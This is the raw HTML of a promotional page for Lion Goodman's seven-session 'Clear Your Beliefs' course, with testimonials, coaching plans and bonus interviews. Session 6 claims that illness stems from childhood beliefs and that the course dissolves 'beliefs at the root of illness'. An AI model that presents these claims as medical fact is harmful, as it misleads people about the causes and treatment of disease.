src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" 